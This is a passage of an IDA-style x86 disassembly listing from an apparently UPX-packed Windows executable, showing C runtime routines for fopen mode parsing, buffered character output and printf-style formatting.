sub_41F11C+136j ; sub_41F11C+17Dj mov byte ptr [edi], 0Ah jmp short loc_41F2CF ; --------------------------------------------------------------------------- loc_41F2B7: ; CODE XREF: sub_41F11C+18Ej ; sub_41F11C+194j push 1 push 0FFFFFFFFh push [ebp+arg_0] call sub_42272B add esp, 0Ch cmp [ebp+var_1], 0Ah jz short loc_41F2D0 loc_41F2CC: ; CODE XREF: sub_41F11C+167j ; sub_41F11C+16Dj mov byte ptr [edi], 0Dh loc_41F2CF: ; CODE XREF: sub_41F11C+199j inc edi loc_41F2D0: ; CODE XREF: sub_41F11C+11Ej ; sub_41F11C+13Fj ... mov ecx, [ebp+var_8] cmp [ebp+arg_8], ecx jb loc_41F223 jmp short loc_41F2EE ; --------------------------------------------------------------------------- loc_41F2DE: ; CODE XREF: sub_41F11C+10Ej mov eax, [ebx] lea esi, [eax+esi+4] mov al, [esi] test al, 40h jnz short loc_41F2EE or al, 2 mov [esi], al loc_41F2EE: ; CODE XREF: sub_41F11C+101j ; sub_41F11C+1C0j ... sub edi, [ebp+arg_4] mov [ebp+var_8], edi loc_41F2F4: ; CODE XREF: sub_41F11C+DAj mov eax, [ebp+var_8] jmp short loc_41F30D ; --------------------------------------------------------------------------- loc_41F2F9: ; CODE XREF: sub_41F11C+12j ; sub_41F11C+39j and ds:dword_4DB95C, 0 mov ds:dword_4DB958, 9 loc_41F30A: ; CODE XREF: sub_41F11C+ABj ; sub_41F11C+C3j or eax, 0FFFFFFFFh loc_41F30D: ; CODE XREF: sub_41F11C+B7j ; sub_41F11C+1DBj pop edi pop esi pop ebx leave retn sub_41F11C endp ; =============== S U B R O U T I N E ======================================= sub_41F312 proc near ; CODE XREF: sub_41B202+126p ; sub_41B202+24Bp ... arg_0 = dword ptr 4 mov eax, ds:dword_4DB9D8 test eax, eax jz short loc_41F32A push [esp+arg_0] call eax test eax, eax pop ecx jz short loc_41F32A push 1 pop eax retn ; --------------------------------------------------------------------------- loc_41F32A: ; CODE XREF: sub_41F312+7j ; sub_41F312+12j xor eax, eax retn sub_41F312 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41F32D proc near ; CODE XREF: sub_41B4A2+17p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ecx push ecx push ebx push esi mov esi, ds:dword_4DBB44 push edi mov edi, [ebp+arg_4] xor ebx, ebx mov [ebp+var_8], ebx mov [ebp+var_4], ebx mov al, [edi] cmp al, 61h jz short loc_41F366 cmp al, 72h jz short loc_41F35F cmp al, 77h jnz loc_41F47A mov ecx, 301h jmp short loc_41F36B ; --------------------------------------------------------------------------- loc_41F35F: ; CODE XREF: sub_41F32D+21j xor ecx, ecx or esi, 1 jmp short loc_41F36E ; --------------------------------------------------------------------------- loc_41F366: ; CODE XREF: sub_41F32D+1Dj mov ecx, 109h loc_41F36B: ; CODE XREF: sub_41F32D+30j or esi, 2 loc_41F36E: ; CODE XREF: sub_41F32D+37j push 1 pop edx loc_41F371: ; CODE XREF: sub_41F32D+8Bj ; sub_41F32D+A0j ... mov al, [edi+1] inc edi cmp al, bl jz loc_41F460 cmp edx, ebx jz loc_41F460 movsx eax, al cmp eax, 54h jg short loc_41F3FF jz short loc_41F3EF sub eax, 2Bh jz short loc_41F3D9 sub eax, 19h jz short loc_41F3CF sub eax, 0Eh jz short loc_41F3BA dec eax jnz loc_41F451 cmp [ebp+var_4], ebx jnz loc_41F451 mov [ebp+var_4], 1 or ecx, 20h jmp short loc_41F371 ; --------------------------------------------------------------------------- loc_41F3BA: ; CODE XREF: sub_41F32D+6Fj cmp [ebp+var_4], ebx jnz loc_41F451 mov [ebp+var_4], 1 or ecx, 10h jmp short loc_41F371 ; --------------------------------------------------------------------------- loc_41F3CF: ; CODE XREF: sub_41F32D+6Aj test cl, 40h jnz short loc_41F451 or ecx, 40h jmp short loc_41F371 ; --------------------------------------------------------------------------- loc_41F3D9: ; CODE XREF: sub_41F32D+65j test cl, 2 jnz short loc_41F451 and ecx, 0FFFFFFFEh and esi, 0FFFFFFFCh or ecx, 2 or esi, 80h jmp short loc_41F371 ; --------------------------------------------------------------------------- loc_41F3EF: ; CODE XREF: sub_41F32D+60j mov eax, 1000h test ecx, eax jnz short loc_41F451 or ecx, eax jmp loc_41F371 ; --------------------------------------------------------------------------- loc_41F3FF: ; CODE XREF: sub_41F32D+5Ej sub eax, 62h jz short loc_41F44C dec eax jz short loc_41F435 sub eax, 0Bh jz short loc_41F41E sub eax, 6 jnz short loc_41F451 test ch, 0C0h jnz short loc_41F451 or ch, 40h jmp loc_41F371 ; --------------------------------------------------------------------------- loc_41F41E: ; CODE XREF: sub_41F32D+DDj cmp [ebp+var_8], ebx jnz short loc_41F451 mov [ebp+var_8], 1 and esi, 0FFFFBFFFh jmp loc_41F371 ; --------------------------------------------------------------------------- loc_41F435: ; CODE XREF: sub_41F32D+D8j cmp [ebp+var_8], ebx jnz short loc_41F451 mov [ebp+var_8], 1 or esi, 4000h jmp loc_41F371 ; --------------------------------------------------------------------------- loc_41F44C: ; CODE XREF: sub_41F32D+D5j test ch, 0C0h jz short loc_41F458 loc_41F451: ; CODE XREF: sub_41F32D+72j ; sub_41F32D+7Bj ... xor edx, edx jmp loc_41F371 ; --------------------------------------------------------------------------- loc_41F458: ; CODE XREF: sub_41F32D+122j or ch, 80h jmp loc_41F371 ; --------------------------------------------------------------------------- loc_41F460: ; CODE XREF: sub_41F32D+4Aj ; sub_41F32D+52j push 1A4h push [ebp+arg_8] push ecx push [ebp+arg_0] call sub_423A33 mov ecx, eax add esp, 10h cmp ecx, ebx jge short loc_41F47E loc_41F47A: ; CODE XREF: sub_41F32D+25j xor eax, eax jmp short loc_41F498 ; --------------------------------------------------------------------------- loc_41F47E: ; CODE XREF: sub_41F32D+14Bj mov eax, [ebp+arg_C] inc ds:dword_4DBB40 mov [eax+0Ch], esi mov [eax+4], ebx mov [eax], ebx mov [eax+8], ebx mov [eax+1Ch], ebx mov [eax+10h], ecx loc_41F498: ; CODE XREF: sub_41F32D+14Fj pop edi pop esi pop ebx leave retn sub_41F32D endp ; =============== S U B R O U T I N E ======================================= sub_41F49D proc near ; CODE XREF: sub_41B4A2p mov edx, ds:dword_4DCC80 push ebx push ebp push esi xor ebp, ebp xor esi, esi xor eax, eax cmp edx, ebp push edi jle short loc_41F50E mov ebx, ds:dword_4DBC78 mov edi, ebx loc_41F4B9: ; CODE XREF: sub_41F49D+2Ej mov ecx, [edi] cmp ecx, ebp jz short loc_41F4D4 test byte ptr [ecx+0Ch], 83h jz short loc_41F4CF inc eax add edi, 4 cmp eax, edx jl short loc_41F4B9 jmp short loc_41F50E ; --------------------------------------------------------------------------- loc_41F4CF: ; CODE XREF: sub_41F49D+26j mov esi, [ebx+eax*4] jmp short loc_41F4F8 ; --------------------------------------------------------------------------- loc_41F4D4: ; CODE XREF: sub_41F49D+20j mov edi, eax push 20h shl edi, 2 call sub_41B4D5 pop ecx mov ecx, ds:dword_4DBC78 mov [edi+ecx], eax mov eax, ds:dword_4DBC78 mov edi, [edi+eax] cmp edi, ebp jz short loc_41F50E mov esi, edi loc_41F4F8: ; CODE XREF: sub_41F49D+35j cmp esi, ebp jz short loc_41F50E or dword ptr [esi+10h], 0FFFFFFFFh mov [esi+4], ebp mov [esi+0Ch], ebp mov [esi+8], ebp mov [esi], ebp mov [esi+1Ch], ebp loc_41F50E: ; CODE XREF: sub_41F49D+12j ; sub_41F49D+30j ... mov eax, esi pop edi pop esi pop ebp pop ebx retn sub_41F49D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41F515 proc near ; CODE XREF: sub_41B6EE+17p ; sub_41B6EE+58p ... var_4 = byte ptr -4 var_3 = byte ptr -3 var_2 = byte ptr -2 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx mov eax, [ebp+arg_0] lea ecx, [eax+1] cmp ecx, 100h ja short loc_41F533 mov ecx, off_43C9D8 movzx eax, word ptr [ecx+eax*2] jmp short loc_41F585 ; --------------------------------------------------------------------------- loc_41F533: ; CODE XREF: sub_41F515+10j mov ecx, eax push esi mov esi, off_43C9D8 sar ecx, 8 movzx edx, cl test byte ptr [esi+edx*2+1], 80h pop esi jz short loc_41F558 and [ebp+var_2], 0 mov [ebp+var_4], cl mov [ebp+var_3], al push 2 jmp short loc_41F561 ; --------------------------------------------------------------------------- loc_41F558: ; CODE XREF: sub_41F515+33j and [ebp+var_3], 0 mov [ebp+var_4], al push 1 loc_41F561: ; CODE XREF: sub_41F515+41j pop eax lea ecx, [ebp+arg_0+2] push 1 push 0 push 0 push ecx push eax lea eax, [ebp+var_4] push eax push 1 call sub_423CEC add esp, 1Ch test eax, eax jnz short loc_41F581 leave retn ; --------------------------------------------------------------------------- loc_41F581: ; CODE XREF: sub_41F515+68j movzx eax, word ptr [ebp+arg_0+2] loc_41F585: ; CODE XREF: sub_41F515+1Cj and eax, [ebp+arg_4] leave retn sub_41F515 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41F58A proc near ; CODE XREF: sub_41B886+46p ; sub_41B980+45p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ebx push esi mov esi, [ebp+arg_4] mov eax, [esi+0Ch] mov ebx, [esi+10h] test al, 82h jz loc_41F693 test al, 40h jnz loc_41F693 test al, 1 jz short loc_41F5C2 and dword ptr [esi+4], 0 test al, 10h jz loc_41F693 mov ecx, [esi+8] and al, 0FEh mov [esi], ecx mov [esi+0Ch], eax loc_41F5C2: ; CODE XREF: sub_41F58A+20j mov eax, [esi+0Ch] and dword ptr [esi+4], 0 and [ebp+arg_4], 0 and al, 0EFh or al, 2 test ax, 10Ch mov [esi+0Ch], eax jnz short loc_41F5FC cmp esi, offset dword_43D0E8 jz short loc_41F5EA cmp esi, offset dword_43D108 jnz short loc_41F5F5 loc_41F5EA: ; CODE XREF: sub_41F58A+56j push ebx call sub_423E35 test eax, eax pop ecx jnz short loc_41F5FC loc_41F5F5: ; CODE XREF: sub_41F58A+5Ej push esi call sub_4239EF pop ecx loc_41F5FC: ; CODE XREF: sub_41F58A+4Ej ; sub_41F58A+69j test word ptr [esi+0Ch], 108h push edi jz short loc_41F669 mov eax, [esi+8] mov edi, [esi] sub edi, eax lea ecx, [eax+1] mov [esi], ecx mov ecx, [esi+18h] dec ecx test edi, edi mov [esi+4], ecx jle short loc_41F62C push edi push eax push ebx call sub_42291D add esp, 0Ch mov [ebp+arg_4], eax jmp short loc_41F65F ; --------------------------------------------------------------------------- loc_41F62C: ; CODE XREF: sub_41F58A+90j cmp ebx, 0FFFFFFFFh jz short loc_41F647 mov eax, ebx mov ecx, ebx sar eax, 5 and ecx, 1Fh mov eax, ds:dword_4DCCA0[eax*4] lea eax, [eax+ecx*8] jmp short loc_41F64C ; --------------------------------------------------------------------------- loc_41F647: ; CODE XREF: sub_41F58A+A5j mov eax, offset dword_43D030 loc_41F64C: ; CODE XREF: sub_41F58A+BBj test byte ptr [eax+4], 20h jz short loc_41F65F push 2 push 0 push ebx call sub_42272B add esp, 0Ch loc_41F65F: ; CODE XREF: sub_41F58A+A0j ; sub_41F58A+C6j mov eax, [esi+8] mov cl, byte ptr [ebp+arg_0] mov [eax], cl jmp short loc_41F67D ; --------------------------------------------------------------------------- loc_41F669: ; CODE XREF: sub_41F58A+79j push 1 lea eax, [ebp+arg_0] pop edi push edi push eax push ebx call sub_42291D add esp, 0Ch mov [ebp+arg_4], eax loc_41F67D: ; CODE XREF: sub_41F58A+DDj cmp [ebp+arg_4], edi pop edi jz short loc_41F689 or dword ptr [esi+0Ch], 20h jmp short loc_41F698 ; --------------------------------------------------------------------------- loc_41F689: ; CODE XREF: sub_41F58A+F7j mov eax, [ebp+arg_0] and eax, 0FFh jmp short loc_41F69B ; --------------------------------------------------------------------------- loc_41F693: ; CODE XREF: sub_41F58A+10j ; sub_41F58A+18j ... or al, 20h mov [esi+0Ch], eax loc_41F698: ; CODE XREF: sub_41F58A+FDj or eax, 0FFFFFFFFh loc_41F69B: ; CODE XREF: sub_41F58A+107j pop esi pop ebx pop ebp retn sub_41F58A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41F69F proc near ; CODE XREF: sub_41B886+29p ; sub_41B980+28p ... var_248 = byte ptr -248h var_247 = byte ptr -247h var_49 = byte ptr -49h var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = byte ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_16 = byte ptr -16h var_15 = byte ptr -15h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 248h push ebx push esi push edi mov edi, [ebp+arg_4] xor esi, esi mov bl, [edi] inc edi test bl, bl mov [ebp+var_C], esi mov [ebp+var_14], esi mov [ebp+arg_4], edi jz loc_41FDB8 mov ecx, [ebp+var_10] xor edx, edx jmp short loc_41F6D3 ; --------------------------------------------------------------------------- loc_41F6CB: ; CODE XREF: sub_41F69F+713j mov ecx, [ebp+var_10] mov esi, [ebp+var_30] xor edx, edx loc_41F6D3: ; CODE XREF: sub_41F69F+2Aj cmp [ebp+var_14], edx jl loc_41FDB8 cmp bl, 20h jl short loc_41F6F4 cmp bl, 78h jg short loc_41F6F4 movsx eax, bl mov al, [eax+427734h] and eax, 0Fh jmp short loc_41F6F6 ; --------------------------------------------------------------------------- loc_41F6F4: ; CODE XREF: sub_41F69F+40j ; sub_41F69F+45j xor eax, eax loc_41F6F6: ; CODE XREF: sub_41F69F+53j movsx eax, byte_427754[esi+eax*8] sar eax, 4 cmp eax, 7 ; switch 8 cases mov [ebp+var_30], eax ja loc_41FDA7 ; default jmp off_41FDC0[eax*4] ; switch jump loc_41F714: ; DATA XREF: UPX0:off_41FDC0o or [ebp+var_10], 0FFFFFFFFh ; jumptable 0041F70D case 1 mov [ebp+var_34], edx mov [ebp+var_28], edx mov [ebp+var_20], edx mov [ebp+var_1C], edx mov [ebp+var_4], edx mov [ebp+var_24], edx jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F72F: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o movsx eax, bl ; jumptable 0041F70D case 2 sub eax, 20h jz short loc_41F772 sub eax, 3 jz short loc_41F769 sub eax, 8 jz short loc_41F760 dec eax dec eax jz short loc_41F757 sub eax, 3 jnz loc_41FDA7 ; default or [ebp+var_4], 8 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F757: ; CODE XREF: sub_41F69F+A4j or [ebp+var_4], 4 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F760: ; CODE XREF: sub_41F69F+A0j or [ebp+var_4], 1 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F769: ; CODE XREF: sub_41F69F+9Bj or byte ptr [ebp+var_4], 80h jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F772: ; CODE XREF: sub_41F69F+96j or [ebp+var_4], 2 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F77B: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o cmp bl, 2Ah ; jumptable 0041F70D case 3 jnz short loc_41F7A3 lea eax, [ebp+arg_8] push eax call sub_41FE7E test eax, eax pop ecx mov [ebp+var_20], eax jge loc_41FDA7 ; default or [ebp+var_4], 4 neg eax loc_41F79B: ; CODE XREF: sub_41F69F+111j mov [ebp+var_20], eax jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F7A3: ; CODE XREF: sub_41F69F+DFj mov eax, [ebp+var_20] movsx ecx, bl lea eax, [eax+eax*4] lea eax, [ecx+eax*2-30h] jmp short loc_41F79B ; --------------------------------------------------------------------------- loc_41F7B2: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o mov [ebp+var_10], edx ; jumptable 0041F70D case 4 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F7BA: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o cmp bl, 2Ah ; jumptable 0041F70D case 5 jnz short loc_41F7DD lea eax, [ebp+arg_8] push eax call sub_41FE7E test eax, eax pop ecx mov [ebp+var_10], eax jge loc_41FDA7 ; default or [ebp+var_10], 0FFFFFFFFh jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F7DD: ; CODE XREF: sub_41F69F+11Ej lea eax, [ecx+ecx*4] movsx ecx, bl lea eax, [ecx+eax*2-30h] mov [ebp+var_10], eax jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F7EF: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o cmp bl, 49h ; jumptable 0041F70D case 6 jz short loc_41F822 cmp bl, 68h jz short loc_41F819 cmp bl, 6Ch jz short loc_41F810 cmp bl, 77h jnz loc_41FDA7 ; default or byte ptr [ebp+var_4+1], 8 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F810: ; CODE XREF: sub_41F69F+15Dj or [ebp+var_4], 10h jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F819: ; CODE XREF: sub_41F69F+158j or [ebp+var_4], 20h jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F822: ; CODE XREF: sub_41F69F+153j cmp byte ptr [edi], 36h jnz short loc_41F83B cmp byte ptr [edi+1], 34h jnz short loc_41F83B inc edi inc edi or byte ptr [ebp+var_4+1], 80h mov [ebp+arg_4], edi jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F83B: ; CODE XREF: sub_41F69F+186j ; sub_41F69F+18Cj mov [ebp+var_30], edx loc_41F83E: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o mov ecx, off_43C9D8 ; jumptable 0041F70D case 0 mov [ebp+var_24], edx movzx eax, bl test byte ptr [ecx+eax*2+1], 80h jz short loc_41F86A lea eax, [ebp+var_14] push eax push [ebp+arg_0] movsx eax, bl push eax call sub_41FDE0 mov bl, [edi] add esp, 0Ch inc edi mov [ebp+arg_4], edi loc_41F86A: ; CODE XREF: sub_41F69F+1B0j lea eax, [ebp+var_14] push eax push [ebp+arg_0] movsx eax, bl push eax call sub_41FDE0 add esp, 0Ch jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41F882: ; CODE XREF: sub_41F69F+6Ej ; DATA XREF: UPX0:off_41FDC0o movsx eax, bl ; jumptable 0041F70D case 7 cmp eax, 67h jg loc_41FAAA cmp eax, 65h jge loc_41F92D cmp eax, 58h jg loc_41F98B jz loc_41FB1E sub eax, 43h jz loc_41F94E dec eax dec eax jz short loc_41F923 dec eax dec eax jz short loc_41F923 sub eax, 0Ch jnz loc_41FCA9 test word ptr [ebp+var_4], 830h jnz short loc_41F8CC or byte ptr [ebp+var_4+1], 8 loc_41F8CC: ; CODE XREF: sub_41F69F+227j ; sub_41F69F+42Aj mov esi, [ebp+var_10] cmp esi, 0FFFFFFFFh jnz short loc_41F8D9 mov esi, 7FFFFFFFh loc_41F8D9: ; CODE XREF: sub_41F69F+233j lea eax, [ebp+arg_8] push eax call sub_41FE7E test word ptr [ebp+var_4], 810h pop ecx mov ecx, eax mov [ebp+var_8], ecx jz loc_41FAF2 test ecx, ecx jnz short loc_41F901 mov ecx, off_43CBF4 mov [ebp+var_8], ecx loc_41F901: ; CODE XREF: sub_41F69F+257j mov [ebp+var_24], 1 mov eax, ecx loc_41F90A: ; CODE XREF: sub_41F69F+282j mov edx, esi dec esi test edx, edx jz loc_41FAE9 cmp word ptr [eax], 0 jz loc_41FAE9 inc eax inc eax jmp short loc_41F90A ; --------------------------------------------------------------------------- loc_41F923: ; CODE XREF: sub_41F69F+212j ; sub_41F69F+216j mov [ebp+var_34], 1 add bl, 20h loc_41F92D: ; CODE XREF: sub_41F69F+1F2j or [ebp+var_4], 40h lea edi, [ebp+var_248] cmp ecx, edx mov [ebp+var_8], edi jge loc_41FA11 mov [ebp+var_10], 6 jmp loc_41FA1F ; --------------------------------------------------------------------------- loc_41F94E: ; CODE XREF: sub_41F69F+20Aj test word ptr [ebp+var_4], 830h jnz short loc_41F95A or byte ptr [ebp+var_4+1], 8 loc_41F95A: ; CODE XREF: sub_41F69F+2B5j ; sub_41F69F+2F4j test word ptr [ebp+var_4], 810h lea eax, [ebp+arg_8] push eax jz short loc_41F9A1 call sub_41FE9B push eax lea eax, [ebp+var_248] push eax call sub_423E5B add esp, 0Ch mov [ebp+var_C], eax test eax, eax jge short loc_41F9B4 mov [ebp+var_28], 1 jmp short loc_41F9B4 ; --------------------------------------------------------------------------- loc_41F98B: ; CODE XREF: sub_41F69F+1FBj sub eax, 5Ah jz short loc_41F9C2 sub eax, 9 jz short loc_41F95A dec eax jz loc_41FB84 jmp loc_41FCA9 ; --------------------------------------------------------------------------- loc_41F9A1: ; CODE XREF: sub_41F69F+2C5j call sub_41FE7E pop ecx mov [ebp+var_248], al mov [ebp+var_C], 1 loc_41F9B4: ; CODE XREF: sub_41F69F+2E1j ; sub_41F69F+2EAj lea eax, [ebp+var_248] mov [ebp+var_8], eax jmp loc_41FCA9 ; --------------------------------------------------------------------------- loc_41F9C2: ; CODE XREF: sub_41F69F+2EFj lea eax, [ebp+arg_8] push eax call sub_41FE7E test eax, eax pop ecx jz short loc_41FA03 mov ecx, [eax+4] test ecx, ecx jz short loc_41FA03 test byte ptr [ebp+var_4+1], 8 jz short loc_41F9F4 movsx eax, word ptr [eax] shr eax, 1 mov [ebp+var_8], ecx mov [ebp+var_C], eax mov [ebp+var_24], 1 jmp loc_41FCA9 ; --------------------------------------------------------------------------- loc_41F9F4: ; CODE XREF: sub_41F69F+33Cj and [ebp+var_24], 0 mov [ebp+var_8], ecx movsx eax, word ptr [eax] jmp loc_41FCA6 ; --------------------------------------------------------------------------- loc_41FA03: ; CODE XREF: sub_41F69F+32Fj ; sub_41F69F+336j mov eax, off_43CBF0 mov [ebp+var_8], eax push eax jmp loc_41FA9F ; --------------------------------------------------------------------------- loc_41FA11: ; CODE XREF: sub_41F69F+29Dj jnz short loc_41FA1F cmp bl, 67h jnz short loc_41FA1F mov [ebp+var_10], 1 loc_41FA1F: ; CODE XREF: sub_41F69F+2AAj ; sub_41F69F:loc_41FA11j ... mov eax, [ebp+arg_8] push [ebp+var_34] add eax, 8 mov [ebp+arg_8], eax push [ebp+var_10] mov ecx, [eax-8] mov [ebp+var_48], ecx mov eax, [eax-4] mov [ebp+var_44], eax movsx eax, bl push eax lea eax, [ebp+var_248] push eax lea eax, [ebp+var_48] push eax call off_43CF80 mov esi, [ebp+var_4] add esp, 14h and esi, 80h jz short loc_41FA71 cmp [ebp+var_10], 0 jnz short loc_41FA71 lea eax, [ebp+var_248] push eax call off_43CF8C pop ecx loc_41FA71: ; CODE XREF: sub_41F69F+3BCj ; sub_41F69F+3C2j cmp bl, 67h jnz short loc_41FA88 test esi, esi jnz short loc_41FA88 lea eax, [ebp+var_248] push eax call off_43CF84 pop ecx loc_41FA88: ; CODE XREF: sub_41F69F+3D5j ; sub_41F69F+3D9j cmp [ebp+var_248], 2Dh jnz short loc_41FA9E or byte ptr [ebp+var_4+1], 1 lea edi, [ebp+var_247] mov [ebp+var_8], edi loc_41FA9E: ; CODE XREF: sub_41F69F+3F0j push edi loc_41FA9F: ; CODE XREF: sub_41F69F+36Dj call sub_41AFE0 pop ecx jmp loc_41FCA6 ; --------------------------------------------------------------------------- loc_41FAAA: ; CODE XREF: sub_41F69F+1E9j sub eax, 69h jz loc_41FB84 sub eax, 5 jz loc_41FB5A dec eax jz loc_41FB47 dec eax jz short loc_41FB17 sub eax, 3 jz loc_41F8CC dec eax dec eax jz loc_41FB88 sub eax, 3 jnz loc_41FCA9 mov [ebp+var_2C], 27h jmp short loc_41FB25 ; --------------------------------------------------------------------------- loc_41FAE9: ; CODE XREF: sub_41F69F+270j ; sub_41F69F+27Aj sub eax, ecx sar eax, 1 jmp loc_41FCA6 ; --------------------------------------------------------------------------- loc_41FAF2: ; CODE XREF: sub_41F69F+24Fj test ecx, ecx jnz short loc_41FAFF mov ecx, off_43CBF0 mov [ebp+var_8], ecx loc_41FAFF: ; CODE XREF: sub_41F69F+455j mov eax, ecx loc_41FB01: ; CODE XREF: sub_41F69F+46Fj mov edx, esi dec esi test edx, edx jz short loc_41FB10 cmp byte ptr [eax], 0 jz short loc_41FB10 inc eax jmp short loc_41FB01 ; --------------------------------------------------------------------------- loc_41FB10: ; CODE XREF: sub_41F69F+467j ; sub_41F69F+46Cj sub eax, ecx jmp loc_41FCA6 ; --------------------------------------------------------------------------- loc_41FB17: ; CODE XREF: sub_41F69F+425j mov [ebp+var_10], 8 loc_41FB1E: ; CODE XREF: sub_41F69F+201j mov [ebp+var_2C], 7 loc_41FB25: ; CODE XREF: sub_41F69F+448j test byte ptr [ebp+var_4], 80h mov [ebp+var_C], 10h jz short loc_41FB8F mov al, byte ptr [ebp+var_2C] mov [ebp+var_16], 30h add al, 51h mov [ebp+var_1C], 2 mov [ebp+var_15], al jmp short loc_41FB8F ; --------------------------------------------------------------------------- loc_41FB47: ; CODE XREF: sub_41F69F+41Ej test byte ptr [ebp+var_4], 80h mov [ebp+var_C], 8 jz short loc_41FB8F or byte ptr [ebp+var_4+1], 2 jmp short loc_41FB8F ; --------------------------------------------------------------------------- loc_41FB5A: ; CODE XREF: sub_41F69F+417j lea eax, [ebp+arg_8] push eax call sub_41FE7E test byte ptr [ebp+var_4], 20h pop ecx jz short loc_41FB73 mov cx, word ptr [ebp+var_14] mov [eax], cx jmp short loc_41FB78 ; --------------------------------------------------------------------------- loc_41FB73: ; CODE XREF: sub_41F69F+4C9j mov ecx, [ebp+var_14] mov [eax], ecx loc_41FB78: ; CODE XREF: sub_41F69F+4D2j mov [ebp+var_28], 1 jmp loc_41FDA7 ; default ; --------------------------------------------------------------------------- loc_41FB84: ; CODE XREF: sub_41F69F+2F7j ; sub_41F69F+40Ej or [ebp+var_4], 40h loc_41FB88: ; CODE XREF: sub_41F69F+432j mov [ebp+var_C], 0Ah loc_41FB8F: ; CODE XREF: sub_41F69F+491j ; sub_41F69F+4A6j ... test byte ptr [ebp+var_4+1], 80h jz short loc_41FBA1 lea eax, [ebp+arg_8] push eax call sub_41FE8B pop ecx jmp short loc_41FBE2 ; --------------------------------------------------------------------------- loc_41FBA1: ; CODE XREF: sub_41F69F+4F4j test byte ptr [ebp+var_4], 20h jz short loc_41FBC8 test byte ptr [ebp+var_4], 40h lea eax, [ebp+arg_8] push eax jz short loc_41FBBD call sub_41FE7E pop ecx movsx eax, ax loc_41FBBA: ; CODE XREF: sub_41F69F+527j ; sub_41F69F+539j cdq jmp short loc_41FBE2 ; --------------------------------------------------------------------------- loc_41FBBD: ; CODE XREF: sub_41F69F+510j call sub_41FE7E pop ecx movzx eax, ax jmp short loc_41FBBA ; --------------------------------------------------------------------------- loc_41FBC8: ; CODE XREF: sub_41F69F+506j test byte ptr [ebp+var_4], 40h lea eax, [ebp+arg_8] push eax jz short loc_41FBDA call sub_41FE7E pop ecx jmp short loc_41FBBA ; --------------------------------------------------------------------------- loc_41FBDA: ; CODE XREF: sub_41F69F+531j call sub_41FE7E pop ecx xor edx, edx loc_41FBE2: ; CODE XREF: sub_41F69F+500j ; sub_41F69F+51Cj test byte ptr [ebp+var_4], 40h jz short loc_41FC03 test edx, edx jg short loc_41FC03 jl short loc_41FBF2 test eax, eax jnb short loc_41FC03 loc_41FBF2: ; CODE XREF: sub_41F69F+54Dj neg eax adc edx, 0 mov esi, eax neg edx or byte ptr [ebp+var_4+1], 1 mov edi, edx jmp short loc_41FC07 ; --------------------------------------------------------------------------- loc_41FC03: ; CODE XREF: sub_41F69F+547j ; sub_41F69F+54Bj ... mov esi, eax mov edi, edx loc_41FC07: ; CODE XREF: sub_41F69F+562j test byte ptr [ebp+var_4+1], 80h jnz short loc_41FC10 and edi, 0 loc_41FC10: ; CODE XREF: sub_41F69F+56Cj cmp [ebp+var_10], 0 jge short loc_41FC1F mov [ebp+var_10], 1 jmp short loc_41FC23 ; --------------------------------------------------------------------------- loc_41FC1F: ; CODE XREF: sub_41F69F+575j and [ebp+var_4], 0FFFFFFF7h loc_41FC23: ; CODE XREF: sub_41F69F+57Ej mov eax, esi or eax, edi jnz short loc_41FC2D and [ebp+var_1C], 0 loc_41FC2D: ; CODE XREF: sub_41F69F+588j lea eax, [ebp+var_49] mov [ebp+var_8], eax loc_41FC33: ; CODE XREF: sub_41F69F+5DDj mov eax, [ebp+var_10] dec [ebp+var_10] test eax, eax jg short loc_41FC43 mov eax, esi or eax, edi jz short loc_41FC7E loc_41FC43: ; CODE XREF: sub_41F69F+59Cj mov eax, [ebp+var_C] cdq push edx push eax push edi push esi mov [ebp+var_40], eax mov [ebp+var_3C], edx call sub_41D480 push [ebp+var_3C] mov ebx, eax add ebx, 30h push [ebp+var_40] push edi push esi call sub_41D410 cmp ebx, 39h mov esi, eax mov edi, edx jle short loc_41FC74 add ebx, [ebp+var_2C] loc_41FC74: ; CODE XREF: sub_41F69F+5D0j mov eax, [ebp+var_8] dec [ebp+var_8] mov [eax], bl jmp 